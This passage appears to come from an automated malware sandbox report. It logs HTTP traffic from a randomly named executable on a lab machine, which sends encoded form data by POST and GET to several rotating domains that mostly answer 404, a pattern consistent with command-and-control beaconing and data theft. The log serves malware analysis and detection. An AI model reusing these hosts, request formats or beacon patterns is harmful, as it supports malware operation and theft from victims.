                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4e 43 66 79 49 38 61 44 38 48 4b 2b 4e 4e 2b 53 72 65 77 6b 6f 79 45 34 4c 6f 4e 63 79 52 4e 47 6c 6d 30 44 72 66 74 30 78 47 2f 74 76 4e 75 4f 7a 62 55 41 78 70 69 6c 77 62 4d 67 46 6d 59 44 31 6a 39 2b 4e 78 41 44 65 59 43 47 71 74 2b 47 2b 4e 68 30 33 2b 6b 78 52 75 66 50 42 4a 31 69 76 6a 70 6e 4f 57 35 66 64 31 35 79 49 42 47 45 34 2b 6e 6a 38 44 67 6e 73 66 6f 41 6d 7a 6a 42 44 62 79 36 57 33 47 4a 76 77 72 42 4a 38 43 58 39 56 50 66 6e 46 55 43 78 48 6a 76 56 2b 69 6e 67 74 52 6b 6c 2f 61 62 6a 41 5a 78 41 4e 6e 51 5a 74 6e 38 72 37 44 2f 61 41 6e 4f 6a 37 30 4c 4c 65 32 6e 42 69 79 4d 4f 35 30 72 76 70 45 37 4f 64 77 39 65 41 54 46 34 73 62 58 6e 6f 38 6b 34 70 6a 61 68 63 63 2f 74 42 75 62 42 6e 48 31 65 6c 5a 5a 6d 5a 44 61 35 69 65 4f 41 4d 74 76 70 37 35 31 73 48 65 31 68 74 79 6d 47 62 76 4c 32 51 6d 42 62 56 77 41 42 6c 42 45 59 65 33 62 55 2f 39 31 75 73 43 37 45 59 6e 6f 4c 33 52 34 64 66 6b 78 59 2f 4b 62 50 43 72 76 43 48 59 [TRUNCATED]
                                        Data Ascii: OlTXe=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 [TRUNCATED]
                                        Sep 11, 2024 10:10:43.578555107 CEST | 221 | OUT | Data Raw: 73 4c 5a 4d 4d 6f 4a 66 51 39 37 6c 46 36 41 62 61 72 35 52 2b 2f 7a 42 76 6a 33 35 44 78 57 41 4e 6a 48 43 4b 68 5a 74 7a 52 4b 59 36 6c 41 58 5a 41 58 6c 78 67 69 6d 6f 52 55 54 53 58 43 6f 38 71 47 2b 74 4d 61 71 39 5a 50 41 37 65 63 30 59 37
                                        Data Ascii: sLZMMoJfQ97lF6Abar5R+/zBvj35DxWANjHCKhZtzRKY6lAXZAXlxgimoRUTSXCo8qG+tMaq9ZPA7ec0Y7INHuC10Uj1Us1e0DvvuJimlWxDAVMz3T5fi1QLJuVDUaH1RMtGIRzTyi58Fbn8l4Sv/X2Tw9I35gFQxY8pg2r6OMe2zPgTGnYE1JZq1CrmGAM9e17dyFsVkE7VzpfCcCWd94rQgi69o
                                        Sep 11, 2024 10:10:44.186044931 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
Data Raw: binary (gzip-compressed HTML body)
Sep 11, 2024 10:10:44.186069012 CEST  370  IN  Data Raw: binary (gzip-compressed HTML body, continued)


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.22  49184        161.97.168.245  80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:10:46.112723112 CEST  732  OUT  POST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Ascii: OlTXe=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDHzOMtVithCxQ8D/qTW0L+G4XYYBqrQ==
Sep 11, 2024 10:10:46.727677107 CEST  1236  IN  HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:46 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
Data Raw: binary (gzip-compressed HTML body)
Sep 11, 2024 10:10:46.727799892 CEST  370  IN  Data Raw: binary (gzip-compressed HTML body, continued)


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.22  49185        161.97.168.245  80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:10:48.656367064 CEST  2472  OUT  POST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Origin: http://www.qiluqiyuan.buzz
                                        Referer: http://www.qiluqiyuan.buzz/wjff/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Sep 11, 2024 10:10:48.661351919 CEST  1685  OUT
Data Ascii: sKpMPkZfN0blC0gb4r5RM/yBJjwJD2AcNgzuKhJtqH6YXvQbHAX5tgg+4RmLSVwg8v1Wtdqq4QvA8ecpx7IcWuHROUSpUvle0VcXhNimjBBDNVMzfT5nu1RKMuUbUaFdRNdGLGTS5l58hbnh54SndX2Dw9Ir5glAxOMpgr76XSO2qCAXJnYFqOOSxJbSRbdFzwIQXU+B1b5FbgcaPK1dDut8lvtkrqPwWWMHpHirA88sILd3rii
Sep 11, 2024 10:10:49.275805950 CEST  1236  IN  HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:49 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: W/"66cd104a-b96"
                                        Content-Encoding: gzip
Data Raw: binary (gzip-compressed HTML body)
Sep 11, 2024 10:10:49.275854111 CEST  370  IN  Data Raw: binary (gzip-compressed HTML body, continued)


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.22  49186        161.97.168.245  80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:10:51.193231106 CEST  459  OUT  GET /wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.qiluqiyuan.buzz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Sep 11, 2024 10:10:51.790452957 CEST  1236  IN  HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:10:51 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 2966
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "66cd104a-b96"
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Sep 11, 2024 10:10:51.790471077 CEST  224  IN
Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
Sep 11, 2024 10:10:51.790482044 CEST  1236  IN
Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
Sep 11, 2024 10:10:51.790493965 CEST  224  IN
Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
Sep 11, 2024 10:10:51.790503025 CEST  250  IN
Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.22  49187        172.96.191.39   80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:10:56.840490103 CEST  2472  OUT  POST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Ascii: OlTXe=cgJ0RJsNAcCJKapGdJaN/PMnj0blGMsozLVu7BwE+BGqsS+GGBAoTG+SPMhctY47fG+QMZ2/HcRSqCNBuH9sK03V8Ka+X6yFy2ow8+YQVVz8hTOOpeIsh34+6jw3pBsPfdhXOOq+3/YxGuGshpyQ0oDqXqlbnltdVNJKOZKuWebFp42CzlXnWm0tDAC/ntDaM44qV5sT6ajfuzO839nRMimkAeOfiGQm118BLb02AlKwNQmVy6kJ6rYc5hdVqNbcnfUElXQkJ1TtI2gyQCdgDrz+0rF+VAvElEXDpDDqedvB9wLwltNbF5Dv88XcOVM+qOREqD9qBSCf0WmiTkO5EvFXCsiB5BdGjToyEqxiGG43Ye9ZE4f+OIvNxQQW68xB7p33HQbuZgxp8eORtL5X+OgSTP8rZvBW8kG5cDUvGoGInY94h2rgDsPqBGVDUaEMjL99Md8a2JjiI/SBYxq326PhnKTGqUnimM18qGu2FuBre5vxTmV7vo803R9gR29f0pKbvPwFIN+9rgA2pvcfPHsAo3L9jOOTzsEuiB5jtOLoTwwt456y79xfrYBY0cswpXhn6JR9i4PXEPQDNKvZSha/5gEjAgXEA/PW693qvcjsQ9i4ztVF26dV0zNjsOIQKCVzRQsr1O1OOlG7iI6nOf0OMtWnKMYBrGF+VWaHZiitalnON7lKDwpGL/7AFosYsI/2g7GEyrTJDlqEHNYHSsMzdhskilX/9riAP/8BJXAXCUjsb7mARuOdM4gXYwld5k0WNkBwUsHQNQnx5CXYbdsTPzP1dyLP8VCQMuXsR2GtpJbquhM48c/jFmnvyqitl95x9Ak2ezzyfdTaerSxjgn4mzVBA0IVW4UUBGq1ceaUSfaekD/5KfgcQT+4LCasKFGaPHgBkr+QDPCSYSb0qigpteyqXKmCWnK7aCyF3HSl7WZ+/02UgKE4+0BYW6EdVYoFd5B7QEzM+hf+h+JvEoS5ZjUDaHFYfWyZqy+pUKuOnH [TRUNCATED]
Sep 11, 2024 10:10:57.068576097 CEST  218  OUT
Data Ascii: 24wpqV1XM2Mj/wV7DU+XIgTunQ6AH2G2a5u6+qmW2G7H0FOmHcVS5uxoS1KvW9Cq+vpLBxdIWu/SSix4qQB1129wP4nzaxl5LEgSB5ppAtvzZWrbmZf/Gv8y4okP7DegGuLZY48FvzKNkesIj2QBnns4fM+4dBJut98l3OVu8fayCDBfFwAjC/XyboJbat4D2lshj05SuOF5UCHCHVBuBLk6cT
Sep 11, 2024 10:10:57.989214897 CEST  1033  IN  HTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:10:57 GMT
                                        server: LiteSpeed
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.22  49188        172.96.191.39   80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:10:59.370445013 CEST  729  OUT  POST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Ascii: OlTXe=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LLaO5ZKq4iLC422emaW0lGWf0xOCfXA==
Sep 11, 2024 10:11:00.293409109 CEST  1033  IN  HTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:00 GMT
                                        server: LiteSpeed
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.22  49189        172.96.191.39   80                1544  C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
Timestamp  Bytes transferred  Direction  Data
Sep 11, 2024 10:11:01.934922934 CEST  2472  OUT  POST /3lkx/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Origin: http://www.bola88site.one
                                        Referer: http://www.bola88site.one/3lkx/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Sep 11, 2024 10:11:01.947081089 CEST  1682  OUT
Data Ascii: 27/5qYyXMxVz+0V7Dm+V9FToLQ6T/2BCO5uK/hv22vsX4pOhPQVXFYxZy1Icu9J+evtrBwXoWZ/TuGx46iB3dQ9BT4hTax0P/HkSB/jJA0vzZyrbudf/rw8zgokOXDYQGtMpZS/FvtKN4ksIrMQB3ns5zMsoNBOut9hV3PLe8NeyOABfwLT3irSFHNJbvd7hi4qg+DzymSF9kiGxqoYothsPFppyCR2/AiqWBeol1qdUe6Uv8Gp
                                        Sep 11, 2024 10:11:02.844991922 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:02 GMT
                                        server: LiteSpeed
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.2.22 | 49190 | 172.96.191.39 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:04.470293999 CEST | 458 | OUT | GET /3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.bola88site.one
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:05.390116930 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        content-type: text/html
                                        content-length: 796
                                        date: Wed, 11 Sep 2024 08:11:05 GMT
                                        server: LiteSpeed
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.2.22 | 49191 | 104.21.20.125 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:10.494278908 CEST | 2472 | OUT | POST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:10.499217987 CEST | 212 | OUT | Data Ascii: 2BRMSeLfz7e348kqnpJxe/tNp8l7k4tlkjx2t+l61kc6L5SZ/8PIqLT7ET5eeIlkUvOsP/mPTZOhEg01t1rgKhFWpoAJc1EMQE4v3We9HCkDHRNCL1cCPsBvXMIoyR11uIapTarXlyXu4paaKeGJh7mDj7zYVfIwfzvHldZifWrbqaQ4Gz68330h6Hef8jbvxwycAumS5AVQKeNa4FCa
                                        Sep 11, 2024 10:11:11.106477022 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:11 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJYBfm7tqo4fWLG5k%2BPUNyzicqDNMpOMPP8Lhk9gSxTuZmNQZBx0ce4elKfNMVrED7p2ulX%2Bq3jZqUHWC9R9xXqYxNBBDYVaRTqUFuOww61ExWBNG8%2BUl26Rs1B%2Fpuu4SGhM"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162f8128428c6b-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        31 | 192.168.2.22 | 49192 | 104.21.20.125 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:13.051879883 CEST | 723 | OUT | POST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Ascii: OlTXe=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5Hngc7tebtWAez8cI56HWso0n1tmzBRpg==
                                        Sep 11, 2024 10:11:13.640247107 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:13 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8kyXab7dwYi%2BYzMhyl6eTU3nEQ%2BTalvjUidLASj8LLz8AcLn8ywE1nD%2F88tGJL%2BbUA%2BTIuuZLplZXJo6c45XWCO05C%2FKynysmthn15S4fFLkimLu9E2t55GRLrXBdipo%2FdL"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162f90fa6c0f7f-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        32 | 192.168.2.22 | 49193 | 104.21.20.125 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:15.602130890 CEST | 2472 | OUT | POST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:15.607566118 CEST | 1676 | OUT | Data Ascii: 4hRPHuL5z7eN49IQnqlxesVNhtl7kotvuDxlp+pS1kgIL4iz4NvIr5r7VxReTIlpK/OrP+arTdrAEhkbsATgLRFW+6YKKFFHGU4o3WeRHCtIHU8FLw4CPu5vYcIn0h1/tIb0Ta29lyPA4t+aKbOJgfCDzrzYQvI5czveo9FhfTCexdYPN0mH2FIajlGj7QST2zy5F/qR7WUrTvBaoTnopmp/SbFpXdIWqpuaCNO48FF/RX5rRaT
                                        Sep 11, 2024 10:11:16.254100084 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        CF-Cache-Status: DYNAMIC
